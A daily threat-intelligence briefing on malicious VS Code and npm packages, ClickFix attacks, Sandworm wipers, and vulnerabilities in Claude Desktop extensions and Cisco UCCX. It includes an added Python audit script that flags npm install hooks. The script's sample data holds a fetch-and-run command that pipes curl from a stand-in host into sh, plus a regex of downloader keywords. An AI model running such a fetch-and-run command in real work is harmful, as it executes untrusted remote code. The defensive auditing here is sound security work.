Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, November 07, 2025


The developer ecosystem is facing threats from within its own tools. A malicious Visual Studio Code extension named susvsex was discovered with ransomware capabilities, using GitHub as a C2 channel.

Russian state-backed hackers are waging a campaign of pure digital destruction against Ukraine. The Sandworm group is deploying data-wiping malware, like ZeroLot and Sting, designed to irretrievably destroy information. These attacks are not for profit but are aimed at sabotaging critical sectors like the grain industry and government.

Cisco has patched a critical vulnerability in its UCCX software that requires no authentication to exploit. Tracked as CVE-2025-20354, the flaw could allow a remote attacker to execute commands with root privileges.

Top Malware Reported in the Last 24 Hours

Malicious VS Code extension raises alarms

A malicious Visual Studio Code extension named "susvsex" was discovered, featuring basic ransomware capabilities and uploaded by a user identified as "suspublisher18." This extension, designed to automatically encrypt and exfiltrate files from specified directories upon launch, was promptly removed from the VS Code Extension Marketplace by Microsoft. It utilizes GitHub as a command-and-control channel, polling a private repository for commands and writing execution results back to it. Additionally, Datadog Security Labs identified 17 npm packages masquerading as legitimate SDKs that deploy Vidar Stealer malware. These packages, which were downloaded over 2,240 times before being taken down, execute malicious payloads through post-install scripts.
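The npm packages above ran their payloads from install-time lifecycle hooks, which npm executes automatically during `npm install`. The following audit script is an added example, not code from the briefing or from Datadog: it walks a `node_modules` tree, reports every package that declares an install hook, and flags commands with downloader-style patterns. The package names and manifests in `demo()` are constructed samples, not real packages.

```python
"""Audit an npm dependency tree for packages that run code at install time."""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks during `npm install`, before any module is imported.
# Installing with `npm install --ignore-scripts` disables them entirely.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic: tokens that often appear in install scripts that fetch and run remote code.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|Invoke-WebRequest|node\s+-e|base64|eval)\b", re.IGNORECASE)


def audit_package_json(text):
    """Return {hook: command} for the install-time scripts declared in one package.json."""
    try:
        manifest = json.loads(text)
    except ValueError:
        return {}  # unparsable manifest: nothing npm could run from it
    scripts = manifest.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def audit_node_modules(root):
    """Walk node_modules and list every package with an install hook, marking risky ones."""
    findings = []
    for manifest in Path(root).glob("**/package.json"):
        hooks = audit_package_json(manifest.read_text(encoding="utf-8", errors="replace"))
        for hook, cmd in hooks.items():
            findings.append({"package": manifest.parent.name, "hook": hook,
                             "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def demo():
    """Build a constructed node_modules tree (sample data, not real packages) and audit it."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    samples = {
        "good-lib": {"scripts": {"test": "jest"}},                                   # no hook
        "native-lib": {"scripts": {"postinstall": "node scripts/build.js"}},         # benign hook
        "fake-sdk": {"scripts": {"postinstall": "curl -s http://example.invalid/s | sh"}},
    }
    for name, manifest in samples.items():
        (root / name).mkdir(parents=True)
        (root / name / "package.json").write_text(json.dumps(manifest))
    return audit_node_modules(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Any package flagged `suspicious` deserves a manual look at the script before the dependency is allowed into a build; unflagged hooks still run code and are worth reviewing for unfamiliar packages.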

ClickFix malware attacks are evolving

ClickFix malware attacks have advanced to include features such as embedded video tutorials that guide victims through self-infection processes and automatic detection of the operating system to provide tailored commands. These attacks often employ social engineering tactics, tricking users into executing malicious code sourced from deceptive web pages. Recent campaigns have utilized fake Cloudflare CAPTCHA challenges, which not only pressure victims with countdown timers but also display misleading verification counters to enhance credibility. These sophisticated ClickFix attacks target all major operating systems and are primarily disseminated through malvertising and SEO poisoning, exploiting vulnerabilities in outdated WordPress plugins to inject harmful JavaScript into legitimate sites.

Sandworm targets Ukraine with data wipers

Russian state-backed hacker group Sandworm has intensified its attacks on Ukraine, deploying various data-wiping malware to disrupt critical sectors, particularly targeting the grain industry, government, and educational institutions. These operations occurred in June and September, reflecting a strategic shift towards undermining Ukraine's economic stability during the ongoing conflict. The malware, including variants like ZeroLot and Sting, aims to destroy digital information irretrievably, in contrast with ransomware, which typically seeks financial gain through data theft. Initial access for these attacks was often facilitated by another group, UAC-0099, indicating a coordinated effort in cyber sabotage against Ukraine's vital economic resources.

Top Vulnerabilities Reported in the Last 24 Hours

Critical RCE bugs in Claude Desktop

Security researchers have identified critical RCE vulnerabilities in Claude Desktop extensions developed by Anthropic, specifically affecting the Chrome, iMessage, and Apple Notes connectors. These extensions, which have over 350,000 downloads, were vulnerable to command injection through unsanitized input, allowing attackers to execute arbitrary commands with full system privileges. By manipulating user-provided input, attackers could inject malicious AppleScript commands, leading to severe security breaches including data theft and unauthorized access. The vulnerabilities were confirmed with a high severity rating of 8.9 on the CVSS scale and have since been patched.

Patch this critical Cisco UCCX flaw

Cisco has addressed a critical vulnerability in its Unified Contact Center Express (UCCX) software, identified as CVE-2025-20354, which allows unauthenticated attackers to execute commands with root privileges through the Java RMI process. This flaw stems from inadequate authentication mechanisms, enabling potential exploitation by uploading crafted files. Additionally, a separate vulnerability in the CCX Editor application permits attackers to bypass authentication and run arbitrary scripts with admin rights. Cisco has not observed any public exploit code or evidence of these vulnerabilities being actively exploited. Alongside these issues, a high-severity flaw in the Cisco Identity Services Engine (ISE) could lead to denial-of-service conditions, while several other vulnerabilities could grant high-level privileges to attackers within Cisco's Contact Center products.
